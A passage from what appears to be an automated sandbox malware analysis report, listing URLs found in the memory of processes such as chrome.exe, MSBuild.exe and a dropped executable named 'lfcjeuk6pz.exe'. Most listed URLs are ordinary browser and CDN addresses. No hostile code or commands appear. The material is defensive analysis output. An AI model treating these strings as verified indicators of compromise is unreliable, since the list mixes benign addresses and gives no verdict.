                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: chrome.exe, 00000011.00000003.1427760642.000046FC0312B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432043794.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427726089.000046FC0326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427673944.000046FC03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432092277.000046FC02C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 00000011.00000003.1427760642.000046FC0312B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432043794.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427726089.000046FC0326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427673944.000046FC03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432092277.000046FC02C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 00000011.00000003.1427760642.000046FC0312B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432043794.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427726089.000046FC0326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427673944.000046FC03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432092277.000046FC02C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 00000011.00000003.1427760642.000046FC0312B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432043794.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427726089.000046FC0326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427673944.000046FC03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432092277.000046FC02C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.15.drString found in binary or memory: http://upx.sf.net
                Source: chromecache_698.18.drString found in binary or memory: http://www.broofa.com
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, jwb1v3.15.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: Reporting and NEL.22.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
                Source: Reporting and NEL.22.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmp, chromecache_698.18.dr, chromecache_702.18.drString found in binary or memory: https://apis.google.com
                Source: msedge.exe, 00000013.00000002.1546759488.000002028C323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com963
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://assets.msn.cn/resolver/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://assets.msn.com/resolver/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://bit.ly/wb-precache
                Source: MSBuild.exe, 0000000F.00000002.2006634073.000000000100B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2013453032.00000000043EA000.00000004.00000020.00020000.00000000.sdmp, 2noh4e.15.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600
                Source: MSBuild.exe, 0000000F.00000002.2006634073.000000000100B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2013453032.00000000043EA000.00000004.00000020.00020000.00000000.sdmp, 2noh4e.15.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&cta
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://browser.events.data.msn.cn/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://browser.events.data.msn.com/
                Source: Reporting and NEL.22.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://c.msn.com/
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, jwb1v3.15.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: offscreendocument_main.js.21.dr, service_worker_bin_prod.js.21.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/js/comments2/index-vflQdvUHu.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmp, lfcjeuk6pz.exe.15.drString found in binary or memory: https://cfl.dropboxstatic.com/static/js/file_viewer/index.web-vflDar80-.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserve=
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/fingerprintjs_component-vflTizAkf.c
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/app_actions/index-vflwwzTNE.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/index.web-vflcAX8Xm.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/tokens-vflQUCxss.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-illustrations/index.web-vflvQ550X.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig/fonts-vflMHuSEC.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error-vflnT9dMs.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/foundation-vflH6wwwv.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/gooR
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/maestro_appshell_styles-vflfNNLV5.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/snackbar-vfl0sHK6v.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/spectrum/index.web-vflwvsegv.css
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmp, lfcjeuk6pz.exe.15.drString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/images/favicon.ico
                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmp, lfcjeuk6pz.exe.15.drString found in binary or memory: https://cfl.dropboxstatic.com/static/typescript/component_libraries/dig-experimental/src/index.web-v
